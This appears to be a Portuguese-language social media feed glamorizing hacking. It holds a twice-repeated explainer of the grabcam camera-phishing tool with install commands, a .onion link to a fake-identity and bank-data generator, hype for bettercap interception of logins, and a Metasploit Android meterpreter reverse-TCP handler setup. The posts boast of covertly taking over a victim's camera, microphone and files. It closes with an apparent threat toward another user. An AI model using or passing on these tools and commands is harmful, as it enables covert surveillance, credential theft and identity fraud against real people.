Avatar
SOUL GHOST
376a5cce3d875f457cad6a7226af55675daa665aec01b599614cf3693c493cf8
Replying to Avatar SOUL GHOST

**O que é e como funciona o Grabcam?**

O grabcam é um script simples, geralmente escrito em Shell e PHP, projetado para criar uma página de phishing que engana o usuário para que ele conceda acesso à sua câmera.

> Não é uma ferramenta avançada, mas serve como um excelente exemplo prático para entender os conceitos básicos de engenharia social e ataques de phishing.

O funcionamento geralmente segue estes passos:

1.Execução do Script: Ao rodar o grabcam.sh, o script inicia um servidor web local (usando PHP) e gera um link malicioso.

2.Engenharia Social: O próximo passo, que não faz parte da ferramenta em si, é a engenharia social. O atacante precisa convencer a vítima a clicar nesse link. O link geralmente é mascarado para parecer algo legítimo, como um prêmio, um site de notícias ou um portal de login.

3.Página Falsa (Phishing): Quando a vítima acessa o link, ela se depara com uma página falsa que solicita permissão para acessar a câmera do dispositivo (celular ou computador). A página pode usar pretextos como "verificação de identidade por foto" ou "teste de webcam".

4.Captura de Imagem: Se a vítima conceder a permissão, o site tira uma ou mais fotos usando a câmera frontal do dispositivo e as envia para o servidor do atacante, que no caso do grabcam, é a máquina onde o script foi executado.

5.Armazenamento : As imagens capturadas são salvas em um diretório no computador do atacante, que pode então visualizá-las.

Comandos de instalação no termux:

apt-get update -y e apt-get upgrade -y

pkg install python -y e pkg install python2 -y

pkg install git -y

pip install lolcat

git clone https://github.com/noob-hackers/grab

cd grabcam

bash grabcam.sh

Em resumo, o grabcam não é uma ferramenta "grandiosa" ou complexa, mas é um excelente ponto de partida para estudantes de segurança da informação. Ele demonstra de forma clara e prática como um ataque de phishing pode ser construído e como a engenharia social é crucial para o sucesso de um ataque.

██████╗

██╔════╝

██║

██║

╚██████╗

╚═════╝

██████╗

██╔═══██╗

██║ ██║

██║ ██║

╚██████╔╝

╚═════╝

███╗ ███╗

████╗ ████║

██╔████╔██║

██║╚██╔╝██║

██║ ╚═╝ ██║

╚═╝ ╚═╝

██████╗

██╔══██╗

██████╔╝

██╔═══╝

██║

╚═╝

██████╗

██╔══██╗

██████╔╝

██╔══██╗

██║ ██║

╚═╝ ╚═╝

███████╗

██╔════╝

█████╗

██╔══╝

███████╗

╚══════╝

██████╗

██╔══██╗

██████╔╝

██╔══██╗

██████╔╝

╚═════╝

██╗

██║

██║

██║

██║

╚═╝

████████╗

╚══██╔══╝

██║

██║

██║

╚═╝

██████╗

██╔════╝

██║

██║

╚██████╗

╚═════╝

██████╗

██╔═══██╗

██║ ██║

██║ ██║

╚██████╔╝

╚═════╝

██╗

██║

██║

██║

██║

╚═╝

███╗ ██╗

████╗ ██║

██╔██╗ ██║

██║╚██╗██║

██║ ╚████║

╚═╝ ╚═══╝

**O que é e como funciona o Grabcam?**

O grabcam é um script simples, geralmente escrito em Shell e PHP, projetado para criar uma página de phishing que engana o usuário para que ele conceda acesso à sua câmera.

> Não é uma ferramenta avançada, mas serve como um excelente exemplo prático para entender os conceitos básicos de engenharia social e ataques de phishing.

O funcionamento geralmente segue estes passos:

1.Execução do Script: Ao rodar o grabcam.sh, o script inicia um servidor web local (usando PHP) e gera um link malicioso.

2.Engenharia Social: O próximo passo, que não faz parte da ferramenta em si, é a engenharia social. O atacante precisa convencer a vítima a clicar nesse link. O link geralmente é mascarado para parecer algo legítimo, como um prêmio, um site de notícias ou um portal de login.

3.Página Falsa (Phishing): Quando a vítima acessa o link, ela se depara com uma página falsa que solicita permissão para acessar a câmera do dispositivo (celular ou computador). A página pode usar pretextos como "verificação de identidade por foto" ou "teste de webcam".

4.Captura de Imagem: Se a vítima conceder a permissão, o site tira uma ou mais fotos usando a câmera frontal do dispositivo e as envia para o servidor do atacante, que no caso do grabcam, é a máquina onde o script foi executado.

5.Armazenamento : As imagens capturadas são salvas em um diretório no computador do atacante, que pode então visualizá-las.

Comandos de instalação no termux:

apt-get update -y e apt-get upgrade -y

pkg install python -y e pkg install python2 -y

pkg install git -y

pip install lolcat

git clone https://github.com/noob-hackers/grab

cd grabcam

bash grabcam.sh

Em resumo, o grabcam não é uma ferramenta "grandiosa" ou complexa, mas é um excelente ponto de partida para estudantes de segurança da informação. Ele demonstra de forma clara e prática como um ataque de phishing pode ser construído e como a engenharia social é crucial para o sucesso de um ataque.

Hoje eu quero te mostrar um site da **deep web** que chama bastante atenção.

O endereço é:

elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion.

>Ele é um gerador de identidades falsas.

Ali, você encontra nomes, endereços, números de documentos e até dados bancários, tudo criado do zero.

>Muita gente olha pra isso e pensa logo no uso errado.

Mas a real é que esses sites existem também pra simulações, pra testes de segurança e até pra estudos sobre engenharia social.

A questão é simples: **esse tipo de recurso pode ser uma arma… ou só mais uma ferramenta de conhecimento.

Depende de quem usa.**

Agora me diz, o que você faria se tivesse acesso a uma identidade que nunca existiu?

Na deep web, o poder não está só nos códigos, mas em saber o que poucos sabem.

#deepweb #hackers #nostr #bitcoin #fakeid #hacking #Brasil #digital #id #onion #darkweb

Tenho que admitir que isso ficou bom. https://video.nostr.build/8fb51fdebfa352a6fa45438d38c0becb5b216b2256387f2cdeaa277b16024805.mp4

#lula #janja #13 #Brasil #Brazil #circo #bitcoin #nostr #palhaço

Também gosta de música clássica? Excelente 🫂

⠀⠀⠀⠀⠀⠀⣀⣠⡴⠶⠛⠛⠛⠛⠛⣿⣦⡀⠀⠀ ⠀⠀⠀⠀⠀⣀⡴⠋⠉⠀⠀⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⣀⣾⣵⣶⣿⣿⣿⣿⣿⣦⡀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⣾⣿⡿⠀⠀⠈⢻⣿⠿⠿⠟⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⢹⡟⠁⠀⠀⣰⠟⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⣴⠟⠀⠀⠀⣼⠏⠀⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⣴⣾⣁⣀⣀⣀⠀⣿⡀⠀⠀⠀⠀⠀⣼⠟⠀⣿⠀⠀ ⠀⢿⣅⠀⢿⣿⣾⣍⣻⡇⠀⠀⠀⠀⠀⣿⠀⠀⣿⠀⠀ ⠀⣼⡿⠶⠶⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀⣿⣠⣼⡿⠀⠀ ⠀⣿⣿⣿⣿⡷⠶⠆⠀⠀⠀⠀⠀⠀⠀⣿⡏⠉⠀⠀⠀ ⠀⣿⣿⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⠸⠀⠀⠀⠀ ⠀⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣯⠀⠀⠀⠀⠀ ⣾⠋⠀⠀⠀⠀⠀⢀⣀⣠⣤⣶⣿⠿⠋⠙⣦⡀⠀⠀⠀ ⠙⠷⢶⣶⣶⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠛⠻⣄⠀⠀ ⠀⠀⣼⣿⣿⣿⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠙⣧⠀ ⠀⣰⣿⣿⣿⡟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣾ ⠀⣿⣿⠿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢱⣿ ⣾⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⡤⠖⠋⠉ ⠻⢷⣤⣤⣤⣤⣤⣤⣤⣤⡶⠶⠞⠛⠉⠉⠁

Muito bom. Mesmo não tendo sido o dia mais produtivo, não ouve nada que pudesse atrapalhar o meu dia

> DEFESA-ATAQUE – INJECTOR DE PACOTES COM BETTERCAP

Você já ouviu o ditado:

"Quem controla a rede, controla o jogo."

**Bettercap** é isso

Uma caixa de ferramentas de manipulação de tráfego em tempo real.

Mas no **Termux**… é como carregar um míssil em um celular.

Quer mapear dispositivos conectados?

Interceptar logins em HTTP?

Injetar código em páginas?

Monitorar redes Wi-Fi?

Tudo isso, sem precisar de root.

Sim. Ele roda direto no seu bolso.

Você vira o meio do caminho entre vítima e internet.

Cada clique dela passa por você.

Cada senha. Cada requisição. Cada falha.

> Porque às vezes o poder não está no ataque.

Está na posição certa, na hora certa — e com a ferramenta certa.

#bettercap #networkhacking #maninthemiddle #termux #packetinjection #nostr #infosec #hacking #cibersegurança #cibersecurity

> EXPLOIT – METASPLOIT

Tem gente que invade gritando.

Outros… entram como fantasmas.

Metasploit não é só uma ferramenta —

É um campo de batalha inteiro dentro do seu Termux.

Você não precisa quebrar portas.

Você abre fechaduras com classe.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost SEU_IP

set lport 4444

run

A vítima toca na tela.

Você ganha um portal direto pro sistema dela.

Câmera? Sua.

Microfone? Seu.

Arquivos, localização, acesso total? Também seus.

Sem alarme. Sem rastros. Sem chance de defesa.

Você não está ali só pra invadir.

Você tá ali pra dominar sem ser notado.

Porque quem sabe o que faz... nunca é visto chegando.

> E o mundo digital não pertence a quem tem mais força.

Pertence a quem tem mais consciência tática.

#metasploit #cyberintel #termux #invasão #ethicalhacking #nostr #deeptech

Não adianta nostr:nprofile1qqspxhftq9htg9njgaefr6nmetl97q8qqlwxvynppl6c5zr9t0qmp9gpzfmhxue69uhhqatjwpkx2urpvuhx2ucpz3mhxue69uhhyetvv9ujuerpd46hxtnfduq3qamnwvaz7tmwdaehgu3wwa5kueguy3tt5 todos sabemos quem é você. Tenho essa até uma foto sua: